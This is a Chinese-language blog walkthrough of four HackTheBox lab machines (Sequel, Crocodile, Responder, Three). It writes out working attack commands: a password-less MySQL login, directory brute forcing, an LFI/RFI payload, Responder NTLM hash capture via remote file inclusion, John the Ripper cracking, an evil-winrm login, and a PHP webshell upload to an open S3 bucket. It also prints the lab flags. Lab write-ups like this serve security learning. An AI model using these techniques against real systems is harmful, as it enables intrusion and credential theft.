渗透测试学习day4

news2024/12/23 0:00:19

文章目录

    • 靶机:Sequel
      • Task1
      • Task2
      • Task3
      • Task4
      • Task5
      • Task6
      • Task7
      • Task8
    • 靶机:Crocodile
      • Task1
      • Task2
      • Task3
      • Task4
      • Task5
      • Task6
      • Task7
      • Task8
      • Task9
      • Task10
    • 靶机:Responder
      • Task1
      • Task2
      • Task3
      • Task4
      • Task5
      • Task6
      • Task7
      • Task8
      • Task9
      • Task10
      • Task11
    • 靶机:Three
      • Task1
      • Task2
      • Task3
      • Task4
      • Task5
      • Task6
      • Task7
      • Task8
      • Task9
      • Task10


靶机:Sequel

考察sql注入

Task1

问题:在扫描过程中,我们发现哪个端口为 MySQL 提供服务?

3306

nmap扫描一下,如果不确定扫到哪可以用参数-v

sudo nmap -sV -sC -v 10.129.190.194

在这里插入图片描述

Task2

问题:目标正在运行哪个社区开发的 MySQL 版本?

MariaDB

前一题可以看version,发现是MariaDB

Task3

问题:使用MySQL命令行客户端时,我们需要使用什么开关来指定登录用户名?

-u

Task4

问题:哪个用户名允许我们在不提供密码的情况下登录此 MariaDB 实例?

root

Task5

问题:在 SQL 中,我们可以使用什么符号在查询中指定要显示表中的所有内容?

*

Task6

问题:在SQL中我们需要用什么符号来结束每个查询?

;

Task7

问题:此 MySQL 实例中存在三个在所有 MySQL 实例中通用的数据库。该主机独有的第四个名字是什么?

htb

使用mysql以root用户连接数据库

sudo mysql -h 10.129.190.194 -u root

然后查询数据库

show databases;

在这里插入图片描述

Task8

问题:提交flag

7b4bec00d1a39e3dd4e021ec3d915da8

我们先使用数据库

use htb;

然后查询config表,得到flag
在这里插入图片描述

靶机:Crocodile

考察的是FTP传输协议相关知识

Task1

问题:在扫描过程中,什么NMAP扫描开关使用默认脚本?

-sC

Task2

问题:发现端口 21 上运行的服务版本是什么?

vsftpd 3.0.3

使用nmap的参数-sC

sudo nmap -sV -sC -v 10.129.1.15

在这里插入图片描述

Task3

问题:对于“允许匿名 FTP 登录”消息,我们会返回什么 FTP 代码?

230

在这里插入图片描述

Task4

问题:使用FTP客户端连接到FTP服务器后,当提示匿名登录时,我们提供什么用户名?

Anonymous

由前一题扫描信息第一行可以得知

Task5

问题:匿名连接到FTP服务器后,我们可以使用什么命令下载在FTP服务器上找到的文件?

get

Task6

问题: 我们从FTP服务器下载的“allowed.userlist”中听起来权限更高的用户名是什么?

admin

我们下载下来

get allowed.userlist

在这里插入图片描述

Task7

问题: 目标主机上正在运行哪个版本的Apache HTTP Server?

Apache httpd 2.4.41

nmap扫描结果有
在这里插入图片描述

Task8

问题:我们可以在Gobuster中使用什么开关来指定我们正在寻找特定的文件类型?

-x

我们尝试用其他用户名登录发现不行
在这里插入图片描述又知道该ip存在80端口的http服务
我们用前面靶机使用过的工具gobuster去爆破

gobuster dir --url 10.129.1.15 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html

在这里插入图片描述

Task9

问题:我们可以用目录暴力识别哪个PHP文件,从而提供向web服务进行身份验证的机会?

login.php

由前一题可知

Task10

提交flag

c7110277ac44d78b6a9fff2232434d16

发现存在login.php,拿得到的用户名admin登陆一下
在这里插入图片描述

靶机:Responder

考察的是WinRM服务

Task1

问题:当使用IP地址访问web服务时,我们被重定向到的域是什么?

unika.htb

在这里插入图片描述

Task2

问题:服务器上正在使用哪种脚本语言来生成网页?

PHP

由于访问不到,我们可以用vim编辑器修改hosts文件,将机器IP指向unika.htb,重新访问

sudo vim /etc/hosts

然后输入a启用编辑模式,添加上去
在这里插入图片描述然后esc退出,输入:启用末行模式,最后输入wq保存并退出

然后nmap扫描发现是php服务
在这里插入图片描述

Task3

问题: 用于加载不同语言版本网页的URL参数的名称是什么?

page

在这里插入图片描述点击EN可以修改语言,可以知道参数为page
在这里插入图片描述

Task4

问题:“page”参数的以下哪个值是利用本地文件包含(LFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”

../../../../../windows/system32/drivers/etc/hosts

很明显的目录穿越实现本地文件包含
在这里插入图片描述

Task5

问题:“page”参数的以下哪个值是利用远程文件包含(RFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”

//10.10.14.6/somefile

远程文件包含漏洞
在这里插入图片描述

Task6

问题:NTLM代表什么?

New Technology LAN Manager

Task7

问题:我们在Responder工具中使用哪个标志来指定网络接口?

-I

Task8

问题:有几种工具可以接受 NetNTLMv2 质询/响应,并尝试数百万个密码,以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为“john”,但全名是什么?

John The Ripper

Task9

问题: 管理员用户的密码是什么?

badminton

获取方法如下
我们先查看自己ip地址

ifconfig

然后选择tun0
在这里插入图片描述修改url的ip进行远程文件包含
在这里插入图片描述然后抓包

sudo responder -I tun0

接着访问我们修改过后的url,回到终端就能看到NTLM hash了
在这里插入图片描述
复制整个hash值,退出抓包,把hash值存入文件
然后用john和kali自带的字典破解

john -w=/usr/share/wordlists/rockyou.txt hash.txt

在这里插入图片描述

Task10

问题:我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?

5985

用nmap扫描全部端口
在这里插入图片描述

Task11

问题:提交flag

ea81b7afddd03efaa0945333ed147fac

步骤如下
我们先修改下扫描参数-sV,然后扫出来wsman服务(即windows远程管理的端口)
在这里插入图片描述那么我们使用工具evil-winrm连接

evil-winrm -i 10.129.152.77 -u administrator -p badminton

得到flag
在这里插入图片描述

靶机:Three

考察的是AWS服务

Task1

问题:打开了多少个TCP端口?

2

nmap扫一下
在这里插入图片描述

Task2

问题: 网站“联系人”部分提供的电子邮件地址的域是什么?

thetoppers.htb

登录该ip,拉到网页最下面找到
在这里插入图片描述

Task3

问题:在没有DNS服务器的情况下,我们可以使用哪个Linux文件将主机名解析为IP地址,以便能够访问指向这些主机名的网站?

/etc/hosts

Task4

问题:在进一步枚举期间发现哪个子域?

s3.thetoppers.htb

步骤如下

gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain

发现有个404状态的,猜测就是
在这里插入图片描述

Task5

问题:发现的子域上运行的是哪个服务?

amazon s3

将该域名添加到/etc/hosts,访问http://s3.thetoppers.htb/
在这里插入图片描述

Task6

问题:哪个命令行实用程序可以用于与在发现的子域上运行的服务交互?

awscli

Task7

问题:哪个命令用于设置AWS CLI安装?

aws configure

在这里插入图片描述

Task8

问题:上述实用程序使用什么命令列出所有 S3 存储桶?

aws s3 ls

Task9

问题:此服务器配置为运行用何种web脚本语言编写的文件?

PHP

Task10

问题:提交flag

a980d99281a28d638ac68b9bf9453c2b

解题过程
使用命令通过指定的 S3 端点连接到 s3.thetoppers.htb,然后列出 thetoppers.htb 存储桶中的对象

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

接着我们在本地写个马

echo '<?php system($_GET["cmd"]); ?>' > shell.php

传马

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

成功写入
在这里插入图片描述
然后访问http://thetoppers.htb/shell.php命令执行得到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1284376.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用百度开发者平台处理语音朗读

--TIME --百度开发者中心-汇聚、开放、助力、共赢 --注册账号 -- 准备工作 准备工作 更新时间&#xff1a;2023-01-13 成为开发者 三步完成账号的基本注册与认证&#xff1a; STEP1&#xff1a;点击进入控制台&#xff0c;选择需要使用的AI服务项。若为未登录状态&#xf…

CleanMyMac X2024破解注册激活码

CleanMyMac X for Mac中文2024版只需两个简单步骤就可以把系统里那些乱七八糟的无用文件统统清理掉&#xff0c;节省宝贵的磁盘空间。 cleanmymac x个人认为X代表界面上的最大升级&#xff0c;功能方面有更多增加&#xff0c;与最新macOS系统更加兼容&#xff0c;流畅地与系统性…

MacBook Pro 安装Redis【超详细图解】

目录 一、使用brew安装Redis 二、查看安装及配置文件位置 三、启动Redis 3.1 查看redis服务进程 3.2 redis-cli连接redis服务 四、关闭Redis 因项目需要&#xff0c;顺便记录安装过程 一、使用brew安装Redis brew install redis 如图所示即为安装成功&#xff01; 二…

csdn语法说明/csdn新手指导/csdn入门指导/csdn博文助手

文章目录 1、文章目录2、标题3、文本样式3.1、强调、加粗、黄色标记、删除、引用、乘方&#xff0c;化学表达式3.2、标红、按钮效果 4、功能快捷键5、注脚、注释6、链接7、图片8、列表9、表格 本篇博文主要写一下csdn博文中的语法说明。 1、文章目录 [TOC](这里写自定义目录标…

谈谈压测方案的那点事

&#x1f4e2;专注于分享软件测试干货内容&#xff0c;欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; 如有错误敬请指正&#xff01;&#x1f4e2;交流讨论&#xff1a;欢迎加入我们一起学习&#xff01;&#x1f4e2;资源分享&#xff1a;耗时200小时精选的「软件测试」资…

论文解读:EfficientViT-提高吞吐量

摘要 要解决的问题 Vision transformers have shown great success due to their high model capabilities. However, their remarkable performance is accompanied by heavy computation costs, which makes them unsuitable for real-time applications. vit计算开销大&a…

人工智能学习7(决策树算法)

编译工具&#xff1a;PyCharm 文章目录 编译工具&#xff1a;PyCharm 决策树算法信息熵信息熵例题计算&#xff1a; 信息增益&#xff08;决策树划分依据之一ID3&#xff09;信息增益例题计算&#xff1a; 信息增益率(决策树划分依据之一C4.5)基尼值和基尼指数(决策树划分依据之…

蓝桥杯物联网竞赛_STM32L071KBU6_全部工程及源码

包含stm32L071kbu6全部实验工程、源码、原理图、官方提供参考代码及原理图 链接&#xff1a;https://pan.baidu.com/s/1xm8mLotLBvOULQlg76ca7g?pwdp0mx 提取码&#xff1a;p0mx

边缘计算网关构建智慧楼宇新生态,打造未来建筑管理

边缘计算网关在无人值守环境中的应用十分广泛&#xff0c;尤其在智慧楼宇管理方面发挥着重要作用。它能够实现多个地点多楼宇之间的数据实时互通&#xff0c;通过边缘计算网关物联网应用构建智慧楼宇生态系统&#xff0c;解决传统楼宇管理网络布线、人员巡检以及后期运维等问题…

SQL Server 数据库,创建数据表(使用T-SQL语句)

2.3表的基本概念 表是包含数据库中所有数据的数据库对象。数据在表中的组织方式与在电子表格中相似&#xff0c;都是 按行和列的格式组织的&#xff0c;每行代表一条唯一的记录&#xff0c;每列代表记录中的一个字段.例如&#xff0c;在包含公 司员工信息的表中&#xff0c;每行…

深度学习模型部署与优化:关键考虑与实践策略

4. 深度学习模型部署与优化&#xff1a;关键考虑与实践策略 4.1 FLOPS TOPS 首先&#xff0c;我们来解释FLOPS和TOPS的含义&#xff1a; FLOPS&#xff1a;是Floating Point Operations Per Second的缩写&#xff0c;意思是每秒浮点运算次数。它是衡量计算机或计算设备在每秒…

深入理解JVM虚拟机第二十七篇:详解JVM当中InvokeDynamic字节码指令,Java是动态类型语言么?

😉😉 学习交流群: ✅✅1:这是孙哥suns给大家的福利! ✨✨2:我们免费分享Netty、Dubbo、k8s、Mybatis、Spring...应用和源码级别的视频资料 🥭🥭3:QQ群:583783824 📚📚 工作微信:BigTreeJava 拉你进微信群,免费领取! 🍎🍎4:本文章内容出自上述:Sp…

前端漏洞--front(系统有user1/user1,admin1/admin1两个用户)

任务一&#xff1a;挖掘反射型XSS漏洞&#xff08;以弹窗test13&#xff09;证明 任务二&#xff1a;复现环境中的CSRF漏洞&#xff0c;设计表单&#xff0c;当管理员点击URL后自动将自己密码重置为&#xff1a;123456 任务三&#xff1a;复现环境中的JSON Hijacking漏洞&#…

【MySQL环境配置在虚拟机中】

MySQL环境配置在虚拟机中 先检查虚拟机中是否有MySQL在线安装1.下载yum Repository2.安装yum Repository3.安装mysql5.7的服务4.开机自启动5.启动mysql6.查看状态7.获取临时密码8.登录mysql9.关闭密码复杂验证10.设置密码11.修改权限12.卸载yum Repository 离线安装1.先找一下机…

【题目】栈和队列专题

文章目录 专题一&#xff1a;栈系列1. 中缀表达式转后缀表达式&#xff08;逆波兰式&#xff09;2. 有效的括号3. 用栈实现队列4. 最小栈 专题一&#xff1a;栈系列 1. 中缀表达式转后缀表达式&#xff08;逆波兰式&#xff09; 算法原理 2. 有效的括号 题目链接 算法原理 代…

uniapp:如何使用uCharts

目录 第一章 前言 第二章 安装插件uCharts 第三章 使用uCharts 第四章 注意 第一章 前言 需求&#xff1a;这是很久之前的一个项目的需求了&#xff0c;当时我刚接触app&#xff0c;有这么一个需求&#xff0c;在uniapp写的app项目中做一些图表统计&#xff0c;最开始以为…

基础堆溢出原理与DWORD SHOOT实现

堆介绍 堆的数据结构与管理策略 程序员在使用堆时只需要做三件事情&#xff1a;申请一定大小的内存&#xff0c;使用内存&#xff0c;释放内存。 对于堆管理系统来说&#xff0c;响应程序的内存使用申请就意味着要在"杂乱"的堆区中"辨别"出哪些内存是正在…

登录校验过滤器

会话技术 JWT令牌 过滤器Filter 拦截器 interceptor cookise package com.it.controller;import com.it.pojo.Result; import lombok.extern.slf4j.Slf4j; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.Re…

密集书库是什么意思?图书馆密集书库的书可以借出吗

密集书库是一种用于存储大量书籍和资料的高密度储存设施。它通常包括一系列钢制书架和可移动的储存架&#xff0c;使得书籍可以被紧密地排列和存储&#xff0c;以最大程度地利用存储空间。同时&#xff0c;密集书库还有各种自动化系统&#xff0c;如自动化取书系统、气候控制系…

bad_python

攻防世界 (xctf.org.cn) 前戏 下载文件&#xff0c;解压完成后是这个 一个pyc文件 这里要用到python的反编译 要用到的工具有两个 1.python自带的uncompyle6 2.pycdc文件——比uncompyle6强大一点 我们一个一个来尝试一下 uncompyle6&#xff1a; 我是直接在pycharm里面…